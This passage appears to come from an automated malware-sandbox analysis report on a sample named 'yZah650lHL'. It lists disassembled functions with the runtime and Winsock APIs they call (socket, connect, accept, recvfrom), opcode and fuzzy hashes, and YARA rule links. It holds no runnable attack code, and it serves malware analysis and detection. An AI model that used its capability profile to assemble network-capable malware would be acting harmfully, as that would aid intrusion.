                    • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                    • Instruction Fuzzy Hash: AE21F17231035086C757BF76E89132D3657AB82BA0F958329FE212B792CB7CC8428715
                    Function 001C621C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 001C624E
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C6245
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __doserrno.LIBCMT ref: 001C62AB
                    • _errno.LIBCMT ref: 001C62B2
                    • _invalid_parameter_noinfo.LIBCMT ref: 001C6316
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 388111225-0
                    • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                    • Instruction ID: 38d4aac9496663a0b74bc99d89ee2c492c4ed760ec678c284055fd81f10a89bb
                    • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                    • Instruction Fuzzy Hash: B8210632710394D6C7066FB59C92F2D3620BBB2BA0F95922DEE2517793CB78C892C710
                    Function 0068FD50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 0068FD76
                    • _errno.LIBCMT ref: 0068FD6B
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1812809483-0
                    • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                    • Instruction ID: 4d6e19287958bf355a1f7852a4977f97c7be83c3748a9460f70b2f05641afc63
                    • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                    • Instruction Fuzzy Hash: 0841477261039186DF20FB2294442FD77A3EB65BE4FA44336EB9447BA6D739C8928700
                    Function 001CF150 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 001CF176
                    • _errno.LIBCMT ref: 001CF16B
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1812809483-0
                    • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                    • Instruction ID: 07de931665cf7b0ae0fbed8da54a5f8435d64601eeafdbe7b98d6462026b7dde
                    • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                    • Instruction Fuzzy Hash: 0341447A610395C2DF24AB62C401BAD72A2E775BE4FA8423EEB9443B85D738C943C700
                    Function 0068027C Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00680264: _mtinitlocknum.LIBCMT ref: 00683DAA
                      • Part of subcall function 00680264: _amsg_exit.LIBCMT ref: 00683DB6
                    • DecodePointer.KERNEL32 ref: 006802D8
                    • DecodePointer.KERNEL32 ref: 006802F6
                    • EncodePointer.KERNEL32 ref: 00680324
                    • DecodePointer.KERNEL32 ref: 00680339
                    • EncodePointer.KERNEL32 ref: 00680344
                    • DecodePointer.KERNEL32 ref: 00680356
                    • DecodePointer.KERNEL32 ref: 00680366
                    • __crtCorExitProcess.LIBCMT ref: 006803EA
                    • ExitProcess.KERNEL32 ref: 006803F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                    • String ID:
                    • API String ID: 1550138920-0
                    • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                    • Instruction ID: 9df82419cd52bf638c99b27bdb88a8babd163be2b3f9864eb32f8bca7f94e206
                    • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                    • Instruction Fuzzy Hash: D7418031216B5297F690AF11FC5431973A7F788BD4F440629E98E93B24DF39C5A98700
                    Function 00676500 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                    • String ID:
                    • API String ID: 3339321253-0
                    • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                    • Instruction ID: b1788b8707f78e1acc7366027eacb695295fd0740c809ae3d58e72257b77e0e2
                    • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                    • Instruction Fuzzy Hash: 97316922314A91A2EB24DF21E8647AE6367F744BA8F544134EE0E47B98EF3DC659C740
                    Function 00676B98 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00676BE0: htonl.WS2_32 ref: 00676C3D
                      • Part of subcall function 00676BE0: select.WS2_32 ref: 00676CAB
                      • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676CC3
                      • Part of subcall function 00676BE0: accept.WS2_32 ref: 00676CE0
                      • Part of subcall function 00676BE0: ioctlsocket.WS2_32 ref: 00676CF8
                      • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676D9B
                    • GetTickCount.KERNEL32 ref: 00676BAA
                      • Part of subcall function 00676F2C: malloc.LIBCMT ref: 00676F5E
                      • Part of subcall function 00676F2C: htonl.WS2_32 ref: 00676F91
                      • Part of subcall function 00676F2C: recvfrom.WS2_32 ref: 00676FD5
                      • Part of subcall function 00676F2C: WSAGetLastError.WS2_32 ref: 00676FE2
                    • GetTickCount.KERNEL32 ref: 00676BC2
                    • GetTickCount.KERNEL32 ref: 006770E0
                    • GetTickCount.KERNEL32 ref: 006770F6
                    • shutdown.WS2_32 ref: 00677115
                    • shutdown.WS2_32 ref: 0067712A
                    • closesocket.WS2_32 ref: 00677134
                    • free.LIBCMT ref: 00677154
                    • free.LIBCMT ref: 00677169
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                    • String ID:
                    • API String ID: 3610715900-0
                    • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                    • Instruction ID: d8f480d3902b15dbd3bfb10997250aad907e18a79d7c5dc3265a71454a942d6c
                    • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                    • Instruction Fuzzy Hash: F2218D72204A42C2DB209F72E85436923A7F748F88F18C225DE4D87725DF75C9A1CB56
                    Function 00687A90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 00687ABB
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00687AB3
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __lock_fhandle.LIBCMT ref: 00687AFF
                    • _lseek_nolock.LIBCMT ref: 00687B18
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                    • String ID:
                    • API String ID: 310312816-0
                    • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                    • Instruction ID: 24f0610d08a0e9dc992270e57341d53098f47f79d343df18f8d8b644598904b5
                    • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                    • Instruction Fuzzy Hash: 2411783270824046E7167F65E89136DB663BB817A1F29431DEE251B3D1CB7CC882D719
                    Function 00687C08 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 00687C33
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00687C2B
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __lock_fhandle.LIBCMT ref: 00687C77
                    • _lseeki64_nolock.LIBCMT ref: 00687C90
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                    • String ID:
                    • API String ID: 4140391395-0
                    • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                    • Instruction ID: 5dc25f8dcf996d4c8157047387c0dd1f90f798925ef1df76545ee2abbc0fabdd
                    • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                    • Instruction Fuzzy Hash: 451156327086404AEB567F26E85136D7A53AB81BB1F294718FE391B3D2CB3CC442C729
                    Function 001C7008 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 001C7033
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C702B
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __lock_fhandle.LIBCMT ref: 001C7077
                    • _lseeki64_nolock.LIBCMT ref: 001C7090
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                    • String ID:
                    • API String ID: 4140391395-0
                    • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                    • Instruction ID: 058669ddc30177cea810e3a2b2250b9773ba6fff2ecb30b693514bc95a488f4f
                    • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                    • Instruction Fuzzy Hash: 8711022270428055EB052F659802B7DBA11A7B2BB1F19471CBE350B7D2CBBCC8A1CB21
                    Function 001C6E90 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 001C6EBB
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C6EB3
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __lock_fhandle.LIBCMT ref: 001C6EFF
                    • _lseek_nolock.LIBCMT ref: 001C6F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                    • String ID:
                    • API String ID: 310312816-0
                    • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                    • Instruction ID: bfdf8927219a1c0db9bc5fb0f70ec63aa55916b6475b4c1005a446d7f9587be5
                    • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                    • Instruction Fuzzy Hash: 0D11033270068055D7066F65E862B7D6A61BBB1BA1F5A422DBA150B3D2CB7CC891C724
                    Function 001BF36C Relevance: 12.6, APIs: 10, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno
                    • String ID:
                    • API String ID: 2288870239-0
                    • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                    • Instruction ID: ddea1815f7091b6444c24c87483e48f1ed0a7c78e2103579739e950a14cedbcc
                    • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                    • Instruction Fuzzy Hash: 5831F635601A8185FE18EF55ECA53EC23A1BBA8BA0F5C0239DD1E0B6A1DF2CC446C351
                    Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                    • Address %p has no image-section, xrefs: 00401DC0
                    • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                    • Mingw-w64 runtime failure:, xrefs: 00401D88
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: QueryVirtual
                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                    • API String ID: 1804819252-1534286854
                    • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                    • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                    • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                    • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                    Function 00686434 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 0068645F
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00686457
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __lock_fhandle.LIBCMT ref: 006864A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                    • String ID:
                    • API String ID: 2611593033-0
                    • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                    • Instruction ID: c3f53764061b736138cf567853190568bf4f5ca1a6f594924a029798c2a7fa8e
                    • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                    • Instruction Fuzzy Hash: 7011563270024046E756BF65E85132D7A93AB81BB1F59831DFE251B3D2CB7CC842C729
                    Function 001C5834 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 001C585F
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C5857
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __lock_fhandle.LIBCMT ref: 001C58A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                    • String ID:
                    • API String ID: 2611593033-0
                    • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                    • Instruction ID: 634e98f625f9fa467a82c9908df3940d2cda5850be515b119fa48cb2f3079672
                    • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                    • Instruction Fuzzy Hash: 56113632B00A8096D7052F66EC42B7D7A22B7B1BA1F5A421DAA150B3D2CB7CD881D720
                    Function 0068A73C Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                    • String ID:
                    • API String ID: 2289611984-0
                    • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                    • Instruction ID: 0d8c8305014683f044f82c85f488e99059061193ed71ff6f56693760bce6f3a0
                    • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                    • Instruction Fuzzy Hash: D811383530064185F716BFE5A8A036D7667AB81B60F19432EDF160B391CB78C882A35A
                    Function 00685C58 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 00685C79
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00685C71
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __lock_fhandle.LIBCMT ref: 00685CBD
                    • _close_nolock.LIBCMT ref: 00685CD0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                    • String ID:
                    • API String ID: 4060740672-0
                    • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                    • Instruction ID: 14533b4ae420227cbd097e30d8214636af86d3ccf5c4f633f6a5fb2d41b8138a
                    • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                    • Instruction Fuzzy Hash: 91112932700B8046E756BF65EC9532C7A53AF81761F69472DEE1B4B3D2C7B8C8428B19
                    Function 001C5058 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 001C5079
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C5071
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    • __lock_fhandle.LIBCMT ref: 001C50BD
                    • _close_nolock.LIBCMT ref: 001C50D0
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                    • String ID:
                    • API String ID: 4060740672-0
                    • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                    • Instruction ID: 3e54719696332346c6774f72743f91e7305863619329b9cc4123aa14db80aef9
                    • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                    • Instruction Fuzzy Hash: E4113632700A8495D3056F75EC86B6C7A12B7B17A1F6E462CFA1A473D3C7B8C8D18750
                    Function 0066460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 006646A9
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • malloc.LIBCMT ref: 006646B3
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                    • malloc.LIBCMT ref: 006646BE
                    • free.LIBCMT ref: 0066487E
                    • free.LIBCMT ref: 00664886
                    • free.LIBCMT ref: 0066488E
                      • Part of subcall function 006654F0: malloc.LIBCMT ref: 0066553A
                      • Part of subcall function 006654F0: malloc.LIBCMT ref: 00665545
                      • Part of subcall function 006654F0: free.LIBCMT ref: 0066562C
                      • Part of subcall function 006654F0: free.LIBCMT ref: 00665634
                    • free.LIBCMT ref: 0066489A
                    • free.LIBCMT ref: 006648A7
                    • free.LIBCMT ref: 006648B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$malloc$_errno$_callnewh$AllocHeap
                    • String ID:
                    • API String ID: 3534990644-0
                    • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                    • Instruction ID: 34910b46c727ce7705f8db602624640e91d5cf5abd5de39ae3148aadea8298a6
                    • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                    • Instruction Fuzzy Hash: 0A61D0227087C586DB65AF669450BAA7B93FB85BC8F448129DE4A47B06DF38C906CB04
                    Function 001A3A0C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 001A3AA9
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • malloc.LIBCMT ref: 001A3AB3
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                    • malloc.LIBCMT ref: 001A3ABE
                    • free.LIBCMT ref: 001A3C7E
                    • free.LIBCMT ref: 001A3C86
                    • free.LIBCMT ref: 001A3C8E
                      • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A493A
                      • Part of subcall function 001A48F0: malloc.LIBCMT ref: 001A4945
                      • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A2C
                      • Part of subcall function 001A48F0: free.LIBCMT ref: 001A4A34
                    • free.LIBCMT ref: 001A3C9A
                    • free.LIBCMT ref: 001A3CA7
                    • free.LIBCMT ref: 001A3CB4
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$malloc$_errno$_callnewh
                    • String ID:
                    • API String ID: 4160633307-0
                    • Opcode ID: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                    • Instruction ID: 209368a58deb9e4cad09f9a49730c8180387322b07902ac6a1c357e03485ee58
                    • Opcode Fuzzy Hash: 930309f8498ff7a349f5473874db00cb4ae22164d30aab4612de4250541046de
                    • Instruction Fuzzy Hash: 4D61056630478446DF25EF2698507AFBB91F7A6FD8F044126EE4A57B09DF38C606CB00
                    Function 001ABE74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 296COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                    • malloc.LIBCMT ref: 001ABF3B
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                      • Part of subcall function 001BB630: _time64.LIBCMT ref: 001BB654
                      • Part of subcall function 001BB630: malloc.LIBCMT ref: 001BB69C
                      • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB700
                      • Part of subcall function 001BB630: strtok.LIBCMT ref: 001BB711
                      • Part of subcall function 001B28A0: _time64.LIBCMT ref: 001B28AE
                      • Part of subcall function 001BDEA8: malloc.LIBCMT ref: 001BDEF8
                      • Part of subcall function 001BDEA8: realloc.LIBCMT ref: 001BDF07
                    • malloc.LIBCMT ref: 001AC04A
                    • _snprintf.LIBCMT ref: 001AC0C1
                    • _snprintf.LIBCMT ref: 001AC0E7
                    • _snprintf.LIBCMT ref: 001AC10E
                    • free.LIBCMT ref: 001AC2C6
                      • Part of subcall function 001BA144: malloc.LIBCMT ref: 001BA178
                      • Part of subcall function 001BA144: free.LIBCMT ref: 001BA32F
                    Strings
                    Memory Dump Source
